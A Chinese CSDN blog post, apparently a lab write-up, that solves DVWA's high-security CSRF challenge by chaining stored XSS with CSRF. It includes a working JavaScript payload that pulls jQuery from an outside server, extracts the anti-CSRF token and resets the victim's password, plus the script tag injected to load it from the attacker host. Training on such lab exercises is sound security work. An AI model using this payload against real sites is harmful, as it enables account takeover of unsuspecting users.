DVWA csrf高级

最新推荐文章于 2024-04-30 02:37:48 发布
最新推荐文章于 2024-04-30 02:37:48 发布
阅读量320 收藏 1
点赞数
文章标签: csrf 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69374202/article/details/130866686
版权
文章详细描述了一种利用存储型XSS漏洞结合CSRF(跨站请求伪造)来篡改用户密码的攻击方法。攻击者首先在网站的存储模块插入JS代码,当受害者浏览该页面时,其密码会被脚本自动修改。实验步骤包括:插入低级JS验证,寻找XSS注入点,准备并植入JS脚本,以及观察密码更改的结果。
摘要由CSDN通过智能技术生成

利用存储型xss达到csrf改密(跨站)

原理:利用网站的xss存储漏洞插入js代码,而js代码中有攻击者注入的连接脚本(改密),当用户登录浏览储存模块时,自己的密码都会被改成攻击者脚本中写的密码

环境准备:

受害者主机ip  192.168.11.59(虚拟机)

攻击者主机ip : 192.168.11.30(物理机)

测试网络连通性

 实验:

1、切换到低级:<script>alert(1)</script>

2、找到xss注入点,把js代码(<script>alert(1)</script>)丢进去有弹窗,就可以了

3、js脚本准备(我这是从云服务器导入的jequry包,以后不一定有用,可能需要自己准备jequry包,如果自己找不到可以私信我)

header("Access-Control-Allow-Origin:*");

var script=document.createElement("script");

script.type="text/javascript";

script.src="http://47.108.235.197:99/safe15/xss/jquery-3.4.1.min.js";

document.getElementsByTagName('head')[0].appendChild(script);


 

setTimeout(function() {

    $(document).ready(function(){

        var tokenUrl = 'http://192.168.11.59/dvwa/vulnerabilities/csrf/';

        $.get(tokenUrl, function (data) {

            var regex = /user_token\' value\=\'(.*?)\' \/\>/;

            var match = data.match(regex);

            var token = match[1];

            var changeUrl = 'http://192.168.11.59/dvwa/vulnerabilities/csrf/?user_token='+token+

                            '&password_new=1234&password_conf=1234&Change=Change';

            $.get(changeUrl, function (data) {

                alert('done');

            });

        });

    });

}, 500);

4把这个放进去

<script src='http://192.168.11.30/PHP/csrf.js'></script>

 

5切换到高级,看到弹窗(高级中有TOKEN )

 6弹出就自动跨站改掉密码了,退出登录 。再登录发现原来的密码登录不上了

 

7这时候用我们脚本中的密码登录

 

8、登录成功

 

 

幻境512
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA靶机通关攻略第三关——CSRF攻击
小飞飞的博客
03-09 1021
DVWA靶机通关攻略请求伪造详细教学
DVWA练习之CSRF
c_xx__的博客
10-31 403
csrf低中高级以及防御 攻击者:物理机,admin登录 被害者:1337登录 低级: a.源码: 服务器收到修改密码的请求后,会检查参数pass_new与pass_conf是否相同,如果相同,则会更新数据库,修改密码,并没有任何的防CSRF机制 b.操作步骤: 法一:发送修改密码的链接给被害者 保存链接,被害者访问链接: 密码成功更改 原密码登录失败: 更改后的密码登录成功 但是这样的链接目的过于明显,可以换为短链接: 法二:将修改密码的链接写入脚本网页 复制修改密码的链接,在kali上写脚本
DVWACSRF高级
m0_73896875的博客
07-11 295
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码中可以看到生成的Token。在high级别中,屏蔽了标签,所以无法直接利用。
DVWACSRF_全级别
weixin_45378289的博客
07-04 360
1.low级别 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass
DVWACSRF
RexHa的博客
09-30 7594
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWACSRF-High跨站请求伪造高级
qq_39330735的博客
02-09 445
DVWACSRF-High跨站请求伪造高级,通过XSS漏洞联合使用的方法来实现。
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1477
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
dvwa csrf高级
10-12
CSRF 高级攻击则是一种针对具有防御措施的 CSRF 漏洞的攻击方式,它需要攻击者更高的技术能力和对目标站点的深入了解。 在 DVWA 中,可以通过设置 CSRF 等级来模拟具有不同防御措施的场景,包括 low(低)、medium...
dvwa+csrf高级
10-14
高级CSRF攻击通常涉及到一些复杂的技术,例如利用JavaScript代码来构造恶意请求、使用多个跨域站点进行攻击等。为了防止这种攻击,开发人员可以采取一些措施,例如使用CSRF令牌、检查Referer头等。
dvwa靶场中csrf高级怎么绕过
05-19
DVWACSRF高级挑战中,攻击者需要绕过token来成功执行恶意操作。以下是几种常见的绕过方法: 1. 利用XSS漏洞:攻击者可以在受害者的浏览器中注入恶意JavaScript代码,该代码会获取到受害者的CSRF token,然后将...
新手指南:DVWA-1.9全级别教程之CSRF
weixin_50464560的博客
03-19 502
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,并且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分...
零基础怎么学python?(1)
最新发布
2401_84302655的博客
04-30 833
如果对Python感兴趣的话,可以试试我的学习方法以及相关的学习资料Python所有方向的学习路线Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。二、Python必备开发工具。
DVWA系列之17 CSRF***介绍与实施
weixin_34318272的博客
12-24 97
CSRF(Cross-Site Request Forgery)跨站点请求伪造,这种***方式的特点是:***者盗用你的身份,以你的名义进行某些非法操作。CSRF能够使用你的帐户发送邮件,获取你的敏感信息,甚至盗走你的财产。当我们打开或登录某个网站后,在浏览器与网站之间将会产生一个会话,在这个会话没有结束时,你就可以利用你的权限对网站进行某些操作,如:发表文章、发送邮件、删除文章等。当这个会话结束...
DVWA--CSRF
When you collect everything, you understand nothing.
09-16 607
0x00 CSRF介绍 CSRF,全称Cross-site request forgery,即跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作。 可以这样理解CSRF:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请...
DVWA--CSRF(初中高)
firecjh的博客
06-09 1146
构造的攻击页面命名成含受害者主机ip的名字。这样referer就能包含了主机名。只要referer中有这个ip,就能绕过。给出自己的截图过程。3)利用存储型XSS-高级,获取token。2)使用bp抓包,修改referer。4)替换token,修改密码成功。分析中级做了什么过滤。中级使用第二种方法,让。在攻击机创建恶意网页。
DvwaCsrf攻击笔记
JBlock的博客
10-22 2135
介绍今天笔者便用dvwa漏洞测试环境来探讨一下跨站请求攻击。 Csrf全称为Cross-Site Request Forgery中文解释为跨站请求伪造攻击。Csrf通常与XSS结合起来进行利用,一般存在XSS漏洞的网站,很大可能也存在Csrf漏洞。二者最简单的区别就是一个是获得用户信任,一个是获得服务端的信任。生活场景 比如说有一天,你闲来无事在寝室上网,然后打开网页,查看一下自己的银行余e,
DVWA-CSRF全通关(图文详解+源码解析)
热门推荐
weixin_46709219的博客
03-13 1万+
一)名词解释: CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在2013年发布的新版OWASP Top 10中,CSRF排名第8。 二)原理: 三)DVWA——
【工具-DVWADVWA渗透系列三:CSRF
qqchaozai的专栏
10-21 2293
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 5142
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域中可用的全部变量。GLOBALS :引用全局作用域中可用的全部变量。GLOBALS:引用全局作用域中可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值